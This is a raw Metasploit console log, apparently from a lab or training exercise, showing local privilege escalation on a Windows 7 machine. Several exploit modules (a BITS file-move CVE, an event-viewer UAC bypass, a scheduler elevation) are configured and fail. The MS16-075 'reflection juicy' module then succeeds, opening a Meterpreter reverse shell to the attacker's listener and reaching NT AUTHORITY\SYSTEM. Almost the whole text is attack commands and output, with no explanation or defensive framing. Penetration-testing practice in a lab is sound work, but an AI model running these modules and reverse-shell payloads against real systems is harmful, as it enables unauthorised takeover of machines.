1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187
| msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options
Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):
Name Current Setting Required Description ---- --------------- -------- ----------- JOB_WAIT_TIME 20 yes Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds OVERWRITE_DLL false yes Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default). SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows DLL Dropper
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set session 1 session => 1 msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > run
[*] Started reverse TCP handler on 192.168.56.102:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] This target is not presently supported by this exploit. Support may be added in the future! [!] Attempts to exploit this target with this module WILL NOT WORK! [!] The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! [*] Step [-] Exploit aborted due to failure: bad-config: Target is running Windows, its not a version this module supports! Bailing... [*] Exploit completed, but no session was created. msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > use exploit/windows/local/bypassuac_eventvwr [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_eventvwr) > show options
Module options (exploit/windows/local/bypassuac_eventvwr):
Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.160.100 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1 session => 1 msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 192.168.56.102:4444 [-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module [*] Exploit completed, but no session was created. msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms10_092_schelevator [*] Using configured payload windows/shell/reverse_tcp msf6 exploit(windows/local/ms10_092_schelevator) > show options
Module options (exploit/windows/local/ms10_092_schelevator):
Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on TASKNAME no A name for the created task (default random)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows Vista / 7 / 2008 (Dropper)
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms10_092_schelevator) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf6 exploit(windows/local/ms10_092_schelevator) > set session 1 session => 1 msf6 exploit(windows/local/ms10_092_schelevator) > run
[*] Started reverse TCP handler on 192.168.56.102:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [-] Exploit aborted due to failure: no-target: Running against via WOW64 is not supported, try using an x64 meterpreter... [*] Exploit completed, but no session was created. msf6 exploit(windows/local/ms10_092_schelevator) > use exploit/windows/local/ms16_075_reflection_juicy s[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp hmsf6 exploit(windows/local/ms16_075_reflection_juicy) > show options
Module options (exploit/windows/local/ms16_075_reflection_juicy):
Name Current Setting Required Description ---- --------------- -------- ----------- CLSID {4991d34b-80a1-4291-83b6-3328366b9097} yes Set CLSID value of the DCOM to trigger SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC none yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.160.100 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set lhost 192.168.56.102 lhost => 192.168.56.102 msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1 session => 1 msf6 exploit(windows/local/ms16_075_reflection_juicy) > run
[*] Started reverse TCP handler on 192.168.56.102:4444 [+] Target appears to be vulnerable (Windows 7 Service Pack 1) [*] Launching notepad to host the exploit... [+] Process 2320 launched. [*] Reflectively injecting the exploit DLL into 2320... [*] Injecting exploit into 2320... [*] Exploit injected. Injecting exploit configuration into 2320... [*] Configuration injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (177734 bytes) to 192.168.56.108 [*] Meterpreter session 2 opened (192.168.56.102:4444 -> 192.168.56.108:49173) at 2024-12-24 05:26:48 -0500
meterpreter > shell Process 2396 created. Channel 1 created. Microsoft Windows [S�r�m 6.1.7601] Telif Hakk� (c) 2009 Microsoft Corporation. T�m haklar� sakl�d�r.
C:\Windows\system32>whoami whoami nt authority\system
C:\Windows\system32>
|